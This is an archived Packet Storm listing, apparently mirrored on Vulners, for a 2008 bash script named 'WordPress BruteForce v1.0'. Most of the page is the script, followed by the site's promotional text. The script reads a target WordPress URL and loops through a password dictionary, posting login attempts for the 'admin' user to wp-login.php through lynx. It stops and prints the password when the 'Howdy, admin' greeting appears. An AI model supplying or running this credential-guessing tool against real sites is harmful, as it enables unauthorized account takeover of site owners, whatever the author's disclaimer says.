Lucene search
K

wp-bruteforcer.txt

🗓️ 17 Sep 2008 00:00:00Reported by 0x90Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 24 Views

Wordpress BruteForce v1.0 by 0x90, 200

Code
`#!/usr/bin/env bash  
# wordpress BruteForce v1.0  
# coded By 0x90 2008  
# 0x90[at]bsdmail.org  
# I do not take any reponsibilty for what you do with this tool   
# Hopefully it will make your life easier rather then making other   
# peoples lives more difficult!   
  
echo ".::Wordpress BruteForce By 0x90::."  
echo "use a good dictioary rename it to bf_passwords"  
echo  
echo -n "Enter website with full path to wordpress:  
> "  
read site  
  
n=`cat bf_passwords | wc -l`  
for (( i=1; i <= $n; i++));  
do  
#default user is admin  
password=`sed -n "$i"p bf_passwords`  
b=`echo "log=admin&pwd="$password"&wp-submit=Log+In&redirect_to=wp-admin" | lynx -dump -nolist -post_data ""$site"/wp-login.php" | grep -o "Howdy, admin"`  
  
echo trying password $password  
  
if [ ! -z "$b" ]; then  
  
echo "Bengo WebSite "$site" password is: "$password""  
echo "Have Fun ;)"  
exit 0  
fi  
done  
echo  
echo "brute force complete"  
echo "no luck, try better dictionary"  
exit  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Sep 2008 00:00Current
7.4High risk
Vulners AI Score7.4
24